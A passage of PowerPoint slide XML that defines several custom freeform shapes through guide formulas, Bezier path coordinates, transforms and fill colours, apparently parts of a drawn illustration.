                  <a:gd name="connsiteX15" fmla="*/ 1019217 w 1672157"/>
                  <a:gd name="connsiteY15" fmla="*/ 1755942 h 1815955"/>
                  <a:gd name="connsiteX16" fmla="*/ 1259519 w 1672157"/>
                  <a:gd name="connsiteY16" fmla="*/ 1803181 h 1815955"/>
                  <a:gd name="connsiteX17" fmla="*/ 1386291 w 1672157"/>
                  <a:gd name="connsiteY17" fmla="*/ 1815955 h 1815955"/>
                  <a:gd name="connsiteX18" fmla="*/ 1388728 w 1672157"/>
                  <a:gd name="connsiteY18" fmla="*/ 1811977 h 1815955"/>
                  <a:gd name="connsiteX19" fmla="*/ 1672157 w 1672157"/>
                  <a:gd name="connsiteY19" fmla="*/ 1344721 h 1815955"/>
                  <a:gd name="connsiteX20" fmla="*/ 1664993 w 1672157"/>
                  <a:gd name="connsiteY20" fmla="*/ 1323699 h 1815955"/>
                  <a:gd name="connsiteX21" fmla="*/ 1632524 w 1672157"/>
                  <a:gd name="connsiteY21" fmla="*/ 1230226 h 1815955"/>
                  <a:gd name="connsiteX22" fmla="*/ 1093493 w 1672157"/>
                  <a:gd name="connsiteY22" fmla="*/ 240520 h 1815955"/>
                  <a:gd name="connsiteX23" fmla="*/ 635481 w 1672157"/>
                  <a:gd name="connsiteY23" fmla="*/ 17286 h 181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72157" h="1815955">
                    <a:moveTo>
                      <a:pt x="635481" y="17286"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="534140" y="-4125"/>
                      <a:pt x="431691" y="-7078"/>
                      <a:pt x="336659" y="16551"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="237346" y="41208"/>
                      <a:pt x="11323" y="239834"/>
                      <a:pt x="172279" y="313121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168169" y="316545"/>
                      <a:pt x="109951" y="717222"/>
                      <a:pt x="99678" y="732290"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="99677" y="732976"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="96938" y="741194"/>
                      <a:pt x="46939" y="775441"/>
                      <a:pt x="29131" y="789139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-7170" y="815851"/>
                      <a:pt x="-9910" y="853521"/>
                      <a:pt x="22966" y="884343"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44199" y="904205"/>
                      <a:pt x="65431" y="923383"/>
                      <a:pt x="88033" y="941191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105842" y="955574"/>
                      <a:pt x="114060" y="973382"/>
                      <a:pt x="116801" y="995300"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118855" y="1010367"/>
                      <a:pt x="167484" y="1044613"/>
                      <a:pt x="183922" y="1046668"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216113" y="1050778"/>
                      <a:pt x="230496" y="1037764"/>
                      <a:pt x="233237" y="1006258"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236661" y="969957"/>
                      <a:pt x="243510" y="860370"/>
                      <a:pt x="257209" y="845302"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="254469" y="843247"/>
                      <a:pt x="345563" y="395311"/>
                      <a:pt x="345563" y="368599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="352412" y="376133"/>
                      <a:pt x="370734" y="310204"/>
                      <a:pt x="448392" y="253736"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="737270" y="269049"/>
                      <a:pt x="1323867" y="1317501"/>
                      <a:pt x="693940" y="1062166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1056540" y="1626744"/>
                      <a:pt x="626544" y="1594684"/>
                      <a:pt x="1019217" y="1755942"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1071956" y="1775805"/>
                      <a:pt x="1164496" y="1791633"/>
                      <a:pt x="1259519" y="1803181"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1386291" y="1815955"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1388728" y="1811977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1672157" y="1344721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1664993" y="1323699"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1653446" y="1291013"/>
                      <a:pt x="1642198" y="1259506"/>
                      <a:pt x="1632524" y="1230226"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1518827" y="885712"/>
                      <a:pt x="1385953" y="479556"/>
                      <a:pt x="1093493" y="240520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="970208" y="139922"/>
                      <a:pt x="804383" y="52969"/>
                      <a:pt x="635481" y="17286"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="9484"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D0A7BD46-6C88-4E1B-80A9-DB1D5E7EDCDE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="2478563" y="4905369"/>
                <a:ext cx="671220" cy="315061"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 356420 w 929576"/>
                  <a:gd name="connsiteY0" fmla="*/ 57585 h 436331"/>
                  <a:gd name="connsiteX1" fmla="*/ 403847 w 929576"/>
                  <a:gd name="connsiteY1" fmla="*/ 9209 h 436331"/>
                  <a:gd name="connsiteX2" fmla="*/ 429458 w 929576"/>
                  <a:gd name="connsiteY2" fmla="*/ 672 h 436331"/>
                  <a:gd name="connsiteX3" fmla="*/ 874327 w 929576"/>
                  <a:gd name="connsiteY3" fmla="*/ 96476 h 436331"/>
                  <a:gd name="connsiteX4" fmla="*/ 902784 w 929576"/>
                  <a:gd name="connsiteY4" fmla="*/ 130623 h 436331"/>
                  <a:gd name="connsiteX5" fmla="*/ 930291 w 929576"/>
                  <a:gd name="connsiteY5" fmla="*/ 313693 h 436331"/>
                  <a:gd name="connsiteX6" fmla="*/ 933137 w 929576"/>
                  <a:gd name="connsiteY6" fmla="*/ 384834 h 436331"/>
                  <a:gd name="connsiteX7" fmla="*/ 877173 w 929576"/>
                  <a:gd name="connsiteY7" fmla="*/ 418033 h 436331"/>
                  <a:gd name="connsiteX8" fmla="*/ 531901 w 929576"/>
                  <a:gd name="connsiteY8" fmla="*/ 422776 h 436331"/>
                  <a:gd name="connsiteX9" fmla="*/ 142048 w 929576"/>
                  <a:gd name="connsiteY9" fmla="*/ 444593 h 436331"/>
                  <a:gd name="connsiteX10" fmla="*/ 40554 w 929576"/>
                  <a:gd name="connsiteY10" fmla="*/ 419931 h 436331"/>
                  <a:gd name="connsiteX11" fmla="*/ 1663 w 929576"/>
                  <a:gd name="connsiteY11" fmla="*/ 312745 h 436331"/>
                  <a:gd name="connsiteX12" fmla="*/ 1663 w 929576"/>
                  <a:gd name="connsiteY12" fmla="*/ 312745 h 436331"/>
                  <a:gd name="connsiteX13" fmla="*/ 30120 w 929576"/>
                  <a:gd name="connsiteY13" fmla="*/ 271957 h 436331"/>
                  <a:gd name="connsiteX14" fmla="*/ 87981 w 929576"/>
                  <a:gd name="connsiteY14" fmla="*/ 256780 h 436331"/>
                  <a:gd name="connsiteX15" fmla="*/ 198961 w 929576"/>
                  <a:gd name="connsiteY15" fmla="*/ 213147 h 436331"/>
                  <a:gd name="connsiteX16" fmla="*/ 284330 w 929576"/>
                  <a:gd name="connsiteY16" fmla="*/ 137263 h 436331"/>
                  <a:gd name="connsiteX17" fmla="*/ 356420 w 929576"/>
                  <a:gd name="connsiteY17" fmla="*/ 57585 h 43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9576" h="436331">
                    <a:moveTo>
                      <a:pt x="356420" y="57585"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="375391" y="44306"/>
                      <a:pt x="389619" y="26283"/>
                      <a:pt x="403847" y="9209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="411436" y="672"/>
                      <a:pt x="418076" y="-1225"/>
                      <a:pt x="429458" y="672"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="577432" y="32923"/>
                      <a:pt x="725405" y="66122"/>
                      <a:pt x="874327" y="96476"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="896144" y="101219"/>
                      <a:pt x="898989" y="114498"/>
                      <a:pt x="902784" y="130623"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="912269" y="191331"/>
                      <a:pt x="924600" y="252037"/>
                      <a:pt x="930291" y="313693"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="933137" y="342149"/>
                      <a:pt x="929343" y="359223"/>
                      <a:pt x="933137" y="384834"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="933137" y="410445"/>
                      <a:pt x="891401" y="415188"/>
                      <a:pt x="877173" y="418033"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="804135" y="430364"/>
                      <a:pt x="560358" y="423725"/>
                      <a:pt x="531901" y="422776"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="456966" y="420879"/>
                      <a:pt x="216983" y="451232"/>
                      <a:pt x="142048" y="444593"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113592" y="441747"/>
                      <a:pt x="79444" y="438901"/>
                      <a:pt x="40554" y="419931"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-3080" y="395268"/>
                      <a:pt x="-2131" y="354480"/>
                      <a:pt x="1663" y="312745"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1663" y="312745"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="7354" y="297568"/>
                      <a:pt x="14943" y="281443"/>
                      <a:pt x="30120" y="271957"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46245" y="260575"/>
                      <a:pt x="70907" y="255832"/>
                      <a:pt x="87981" y="256780"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130666" y="257729"/>
                      <a:pt x="166710" y="240655"/>
                      <a:pt x="198961" y="213147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="200858" y="211250"/>
                      <a:pt x="261565" y="164771"/>
                      <a:pt x="284330" y="137263"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="294764" y="125881"/>
                      <a:pt x="335552" y="80351"/>
                      <a:pt x="356420" y="57585"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="948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466ADDC-42C2-4348-8DF3-7BDB6ACA78BE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="2233960" y="2365780"/>
                <a:ext cx="205476" cy="143832"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 272154 w 284564"/>
                  <a:gd name="connsiteY0" fmla="*/ 199765 h 199195"/>
                  <a:gd name="connsiteX1" fmla="*/ 231366 w 284564"/>
                  <a:gd name="connsiteY1" fmla="*/ 148543 h 199195"/>
                  <a:gd name="connsiteX2" fmla="*/ 112798 w 284564"/>
                  <a:gd name="connsiteY2" fmla="*/ 119138 h 199195"/>
                  <a:gd name="connsiteX3" fmla="*/ 62525 w 284564"/>
                  <a:gd name="connsiteY3" fmla="*/ 152337 h 199195"/>
                  <a:gd name="connsiteX4" fmla="*/ 36914 w 284564"/>
                  <a:gd name="connsiteY4" fmla="*/ 175103 h 199195"/>
                  <a:gd name="connsiteX5" fmla="*/ 11303 w 284564"/>
                  <a:gd name="connsiteY5" fmla="*/ 179845 h 199195"/>
                  <a:gd name="connsiteX6" fmla="*/ 3715 w 284564"/>
                  <a:gd name="connsiteY6" fmla="*/ 61277 h 199195"/>
                  <a:gd name="connsiteX7" fmla="*/ 40708 w 284564"/>
                  <a:gd name="connsiteY7" fmla="*/ 10055 h 199195"/>
                  <a:gd name="connsiteX8" fmla="*/ 117540 w 284564"/>
                  <a:gd name="connsiteY8" fmla="*/ 1518 h 199195"/>
                  <a:gd name="connsiteX9" fmla="*/ 242749 w 284564"/>
                  <a:gd name="connsiteY9" fmla="*/ 4364 h 199195"/>
                  <a:gd name="connsiteX10" fmla="*/ 275948 w 284564"/>
                  <a:gd name="connsiteY10" fmla="*/ 29975 h 199195"/>
                  <a:gd name="connsiteX11" fmla="*/ 285433 w 284564"/>
                  <a:gd name="connsiteY11" fmla="*/ 181742 h 199195"/>
                  <a:gd name="connsiteX12" fmla="*/ 272154 w 284564"/>
                  <a:gd name="connsiteY12" fmla="*/ 199765 h 1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564" h="199195">
                    <a:moveTo>
                      <a:pt x="272154" y="199765"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="258874" y="182691"/>
                      <a:pt x="245594" y="165617"/>
                      <a:pt x="231366" y="148543"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201961" y="119138"/>
                      <a:pt x="166865" y="95424"/>
                      <a:pt x="112798" y="119138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100467" y="124830"/>
                      <a:pt x="71062" y="134315"/>
                      <a:pt x="62525" y="152337"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62525" y="152337"/>
                      <a:pt x="36914" y="175103"/>
                      <a:pt x="36914" y="175103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32171" y="179845"/>
                      <a:pt x="17943" y="173205"/>
                      <a:pt x="11303" y="179845"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-4822" y="141903"/>
                      <a:pt x="-79" y="102064"/>
                      <a:pt x="3715" y="61277"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6560" y="46100"/>
                      <a:pt x="30274" y="21438"/>
                      <a:pt x="40708" y="10055"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50194" y="-4173"/>
                      <a:pt x="76753" y="570"/>
                      <a:pt x="117540" y="1518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134614" y="570"/>
                      <a:pt x="197219" y="-1327"/>
                      <a:pt x="242749" y="4364"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="251286" y="5312"/>
                      <a:pt x="272154" y="22386"/>
                      <a:pt x="275948" y="29975"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="294919" y="79299"/>
                      <a:pt x="283536" y="131469"/>
                      <a:pt x="285433" y="181742"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="286382" y="190279"/>
                      <a:pt x="279742" y="195971"/>
                      <a:pt x="272154" y="199765"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="948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A076130-1D13-46FE-89BE-E2CDBEBE5ED1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="2873126" y="2323758"/>
                <a:ext cx="116437" cy="27397"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 170647 w 161253"/>
                  <a:gd name="connsiteY0" fmla="*/ 19746 h 37941"/>
                  <a:gd name="connsiteX1" fmla="*/ 16033 w 161253"/>
                  <a:gd name="connsiteY1" fmla="*/ 34922 h 37941"/>
                  <a:gd name="connsiteX2" fmla="*/ 857 w 161253"/>
                  <a:gd name="connsiteY2" fmla="*/ 14054 h 37941"/>
                  <a:gd name="connsiteX3" fmla="*/ 26467 w 161253"/>
                  <a:gd name="connsiteY3" fmla="*/ 1723 h 37941"/>
                  <a:gd name="connsiteX4" fmla="*/ 81483 w 161253"/>
                  <a:gd name="connsiteY4" fmla="*/ 1723 h 37941"/>
                  <a:gd name="connsiteX5" fmla="*/ 170647 w 161253"/>
                  <a:gd name="connsiteY5" fmla="*/ 19746 h 3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53" h="37941">
                    <a:moveTo>
                      <a:pt x="170647" y="19746"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="118477" y="40614"/>
                      <a:pt x="68204" y="52945"/>
                      <a:pt x="16033" y="34922"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6548" y="32077"/>
                      <a:pt x="-2938" y="26386"/>
                      <a:pt x="857" y="14054"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4651" y="2672"/>
                      <a:pt x="15085" y="-2071"/>
                      <a:pt x="26467" y="1723"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45438" y="7415"/>
                      <a:pt x="62512" y="4569"/>
                      <a:pt x="81483" y="1723"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110888" y="-3019"/>
                      <a:pt x="140293" y="1723"/>
                      <a:pt x="170647" y="19746"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E2AA74"/>
              </a:solidFill>
              <a:ln w="948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94E2121-19FD-4E1B-AC94-173EBDCEC355}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="2959305" y="2251007"/>
                <a:ext cx="47944" cy="41095"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 68724 w 66398"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 56912"/>
                  <a:gd name="connsiteX1" fmla="*/ 26039 w 66398"/>
                  <a:gd name="connsiteY1" fmla="*/ 64501 h 56912"/>
                  <a:gd name="connsiteX2" fmla="*/ 10863 w 66398"/>
                  <a:gd name="connsiteY2" fmla="*/ 38890 h 56912"/>
                  <a:gd name="connsiteX3" fmla="*/ 24142 w 66398"/>
                  <a:gd name="connsiteY3" fmla="*/ 11383 h 56912"/>
                  <a:gd name="connsiteX4" fmla="*/ 68724 w 66398"/>
                  <a:gd name="connsiteY4" fmla="*/ 0 h 5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8" h="56912">
                    <a:moveTo>
                      <a:pt x="68724" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52599" y="24662"/>
                      <a:pt x="40268" y="43633"/>
                      <a:pt x="26039" y="64501"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16554" y="56913"/>
                      <a:pt x="12760" y="47427"/>
                      <a:pt x="10863" y="38890"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8966" y="28456"/>
                      <a:pt x="-19491" y="1897"/>
                      <a:pt x="24142" y="11383"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36473" y="13280"/>
                      <a:pt x="49753" y="4743"/>
                      <a:pt x="68724" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="D9AD7C"/>
              </a:solidFill>
              <a:ln w="948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D31E4A-B63A-4B70-9401-8770BBBF2676}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="3466417" y="2308137"/>
                <a:ext cx="109588" cy="198627"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 103496 w 151767"/>
                  <a:gd name="connsiteY0" fmla="*/ 2586 h 275078"/>
                  <a:gd name="connsiteX1" fmla="*/ 160409 w 151767"/>
                  <a:gd name="connsiteY1" fmla="*/ 216958 h 275078"/>
                  <a:gd name="connsiteX2" fmla="*/ 153769 w 151767"/>
                  <a:gd name="connsiteY2" fmla="*/ 259642 h 275078"/>
                  <a:gd name="connsiteX3" fmla="*/ 117725 w 151767"/>
                  <a:gd name="connsiteY3" fmla="*/ 276716 h 275078"/>
                  <a:gd name="connsiteX4" fmla="*/ 9590 w 151767"/>
                  <a:gd name="connsiteY4" fmla="*/ 223597 h 275078"/>
                  <a:gd name="connsiteX5" fmla="*/ 105 w 151767"/>
                  <a:gd name="connsiteY5" fmla="*/ 210318 h 275078"/>
                  <a:gd name="connsiteX6" fmla="*/ 17178 w 151767"/>
                  <a:gd name="connsiteY6" fmla="*/ 205575 h 275078"/>
                  <a:gd name="connsiteX7" fmla="*/ 107290 w 151767"/>
                  <a:gd name="connsiteY7" fmla="*/ 210318 h 275078"/>
                  <a:gd name="connsiteX8" fmla="*/ 143335 w 151767"/>
                  <a:gd name="connsiteY8" fmla="*/ 163839 h 275078"/>
                  <a:gd name="connsiteX9" fmla="*/ 101599 w 151767"/>
                  <a:gd name="connsiteY9" fmla="*/ 7328 h 275078"/>
                  <a:gd name="connsiteX10" fmla="*/ 103496 w 151767"/>
                  <a:gd name="connsiteY10" fmla="*/ 2586 h 2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67" h="275078">
                    <a:moveTo>
                      <a:pt x="103496" y="2586"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="120570" y="60447"/>
                      <a:pt x="157564" y="155302"/>
                      <a:pt x="160409" y="216958"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161358" y="232134"/>
                      <a:pt x="159461" y="246362"/>
                      <a:pt x="153769" y="259642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147129" y="274819"/>
                      <a:pt x="132901" y="279562"/>
                      <a:pt x="117725" y="276716"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76937" y="268179"/>
                      <a:pt x="41841" y="249208"/>
                      <a:pt x="9590" y="223597"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4847" y="219803"/>
                      <a:pt x="-844" y="216009"/>
                      <a:pt x="105" y="210318"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2002" y="201781"/>
                      <a:pt x="11487" y="204626"/>
                      <a:pt x="17178" y="205575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47532" y="206523"/>
                      <a:pt x="76937" y="210318"/>
                      <a:pt x="107290" y="210318"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139541" y="211266"/>
                      <a:pt x="149975" y="197038"/>
                      <a:pt x="143335" y="163839"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135747" y="124000"/>
                      <a:pt x="109188" y="46219"/>
                      <a:pt x="101599" y="7328"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98754" y="-260"/>
                      <a:pt x="100651" y="-2157"/>
                      <a:pt x="103496" y="2586"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="D0A475"/>
              </a:solidFill>
              <a:ln w="948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6F1D403-7673-4E31-92D2-F5C0BFDF7542}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="3765026" y="2340098"/>
                <a:ext cx="6849" cy="6849"/>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0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0B0907"/>
              </a:solidFill>
              <a:ln w="948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3B99644-AE1F-442F-94E8-C9CDB3B35DB1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="2166304" y="2562793"/>
                <a:ext cx="287666" cy="342459"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 49643 w 398390"/>
                  <a:gd name="connsiteY0" fmla="*/ 318369 h 474273"/>
                  <a:gd name="connsiteX1" fmla="*/ 12650 w 398390"/>
                  <a:gd name="connsiteY1" fmla="*/ 270942 h 474273"/>
                  <a:gd name="connsiteX2" fmla="*/ 18341 w 398390"/>
                  <a:gd name="connsiteY2" fmla="*/ 200749 h 474273"/>
                  <a:gd name="connsiteX3" fmla="*/ 13598 w 398390"/>
                  <a:gd name="connsiteY3" fmla="*/ 184624 h 474273"/>
                  <a:gd name="connsiteX4" fmla="*/ 23084 w 398390"/>
                  <a:gd name="connsiteY4" fmla="*/ 154270 h 474273"/>
                  <a:gd name="connsiteX5" fmla="*/ 36364 w 398390"/>
                  <a:gd name="connsiteY5" fmla="*/ 146682 h 474273"/>
                  <a:gd name="connsiteX6" fmla="*/ 43952 w 398390"/>
                  <a:gd name="connsiteY6" fmla="*/ 133402 h 474273"/>
                  <a:gd name="connsiteX7" fmla="*/ 43952 w 398390"/>
                  <a:gd name="connsiteY7" fmla="*/ 93563 h 474273"/>
                  <a:gd name="connsiteX8" fmla="*/ 70511 w 398390"/>
                  <a:gd name="connsiteY8" fmla="*/ 62261 h 474273"/>
                  <a:gd name="connsiteX9" fmla="*/ 98019 w 398390"/>
                  <a:gd name="connsiteY9" fmla="*/ 8194 h 474273"/>
                  <a:gd name="connsiteX10" fmla="*/ 141652 w 398390"/>
                  <a:gd name="connsiteY10" fmla="*/ 606 h 474273"/>
                  <a:gd name="connsiteX11" fmla="*/ 204256 w 398390"/>
                  <a:gd name="connsiteY11" fmla="*/ 14834 h 474273"/>
                  <a:gd name="connsiteX12" fmla="*/ 316185 w 398390"/>
                  <a:gd name="connsiteY12" fmla="*/ 67953 h 474273"/>
                  <a:gd name="connsiteX13" fmla="*/ 394915 w 398390"/>
                  <a:gd name="connsiteY13" fmla="*/ 205492 h 474273"/>
                  <a:gd name="connsiteX14" fmla="*/ 402503 w 398390"/>
                  <a:gd name="connsiteY14" fmla="*/ 240588 h 474273"/>
                  <a:gd name="connsiteX15" fmla="*/ 290574 w 398390"/>
                  <a:gd name="connsiteY15" fmla="*/ 472983 h 474273"/>
                  <a:gd name="connsiteX16" fmla="*/ 269706 w 398390"/>
                  <a:gd name="connsiteY16" fmla="*/ 473931 h 474273"/>
                  <a:gd name="connsiteX17" fmla="*/ 236507 w 398390"/>
                  <a:gd name="connsiteY17" fmla="*/ 460651 h 474273"/>
                  <a:gd name="connsiteX18" fmla="*/ 49643 w 398390"/>
                  <a:gd name="connsiteY18" fmla="*/ 318369 h 4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8390" h="474273">
                    <a:moveTo>
                      <a:pt x="49643" y="318369"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35415" y="304141"/>
                      <a:pt x="24032" y="288016"/>
                      <a:pt x="12650" y="270942"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-14858" y="227309"/>
                      <a:pt x="9804" y="226360"/>
                      <a:pt x="18341" y="200749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20238" y="196955"/>
                      <a:pt x="16444" y="191264"/>
                      <a:pt x="13598" y="184624"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7907" y="173241"/>
                      <a:pt x="12650" y="159962"/>
                      <a:pt x="23084" y="154270"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="36364" y="146682"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="41106" y="143836"/>
                      <a:pt x="43952" y="139094"/>
                      <a:pt x="43952" y="133402"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43003" y="121071"/>
                      <a:pt x="35415" y="115380"/>
                      <a:pt x="43952" y="93563"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54386" y="70798"/>
                      <a:pt x="73357" y="85975"/>
                      <a:pt x="70511" y="62261"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64820" y="25268"/>
                      <a:pt x="59129" y="18628"/>
